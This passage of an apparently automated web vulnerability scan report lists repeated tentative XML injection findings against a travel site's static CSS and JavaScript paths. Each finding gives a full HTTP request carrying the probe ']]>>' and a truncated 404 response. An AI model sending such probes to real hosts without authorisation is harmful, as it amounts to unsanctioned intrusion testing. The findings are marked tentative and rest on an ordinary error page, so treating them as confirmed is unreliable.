Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/css]]>>/hotel/details/hotelDetailsMapContainerComp.css?ver=219463 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:29 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.15. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/css/hotel]]>>/details/hotelDetailsMapContainerComp.css?ver=219463 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:31 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.16. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css [REST URL parameter 5]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/css/hotel/details]]>>/hotelDetailsMapContainerComp.css?ver=219463 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535999
Date: Mon, 03 Oct 2011 01:02:34 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.17. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css [REST URL parameter 6]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css

Issue detail

The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css]]>>?ver=219463 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:37 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.18. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsPrint.css [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/hotel/details/hotelDetailsPrint.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/deploy/css/hotel/details/hotelDetailsPrint.css?ver=209738 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535960
Date: Mon, 03 Oct 2011 01:01:57 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.19. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsPrint.css [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/hotel/details/hotelDetailsPrint.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy]]>>/css/hotel/details/hotelDetailsPrint.css?ver=209738 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:00 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.20. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsPrint.css [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/hotel/details/hotelDetailsPrint.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/css]]>>/hotel/details/hotelDetailsPrint.css?ver=209738 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:03 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.21. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsPrint.css [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/hotel/details/hotelDetailsPrint.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/css/hotel]]>>/details/hotelDetailsPrint.css?ver=209738 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:09 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.22. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsPrint.css [REST URL parameter 5]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/hotel/details/hotelDetailsPrint.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/css/hotel/details]]>>/hotelDetailsPrint.css?ver=209738 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535997
Date: Mon, 03 Oct 2011 01:02:14 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.23. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsPrint.css [REST URL parameter 6]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/hotel/details/hotelDetailsPrint.css

Issue detail

The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/css/hotel/details/hotelDetailsPrint.css]]>>?ver=209738 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535998
Date: Mon, 03 Oct 2011 01:02:18 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.24. http://ak-static.hotwirestatic.com/static/deploy/javascript/car/CarAddOnComp.js [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/javascript/car/CarAddOnComp.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/deploy/javascript/car/CarAddOnComp.js?ver=186632 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:01 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.25. http://ak-static.hotwirestatic.com/static/deploy/javascript/car/CarAddOnComp.js [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/javascript/car/CarAddOnComp.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy]]>>/javascript/car/CarAddOnComp.js?ver=186632 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535967
Date: Mon, 03 Oct 2011 01:02:06 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.26. http://ak-static.hotwirestatic.com/static/deploy/javascript/car/CarAddOnComp.js [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/javascript/car/CarAddOnComp.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/javascript]]>>/car/CarAddOnComp.js?ver=186632 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535999
Date: Mon, 03 Oct 2011 01:02:10 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.27. http://ak-static.hotwirestatic.com/static/deploy/javascript/car/CarAddOnComp.js [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/javascript/car/CarAddOnComp.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/javascript/car]]>>/CarAddOnComp.js?ver=186632 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:14 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.28. http://ak-static.hotwirestatic.com/static/deploy/javascript/car/CarAddOnComp.js [REST URL parameter 5]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/javascript/car/CarAddOnComp.js

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/javascript/car/CarAddOnComp.js]]>>?ver=186632 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:17 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.29. http://ak-static.hotwirestatic.com/static/deploy/javascript/core/comp/HwTilesComp.js [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/javascript/core/comp/HwTilesComp.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/deploy/javascript/core/comp/HwTilesComp.js?ver=185918 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:56 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.30. http://ak-static.hotwirestatic.com/static/deploy/javascript/core/comp/HwTilesComp.js [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/javascript/core/comp/HwTilesComp.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy]]>>/javascript/core/comp/HwTilesComp.js?ver=185918 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:58 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.31. http://ak-static.hotwirestatic.com/static/deploy/javascript/core/comp/HwTilesComp.js [REST URL parameter 3]

Summary

Severity:   Medium
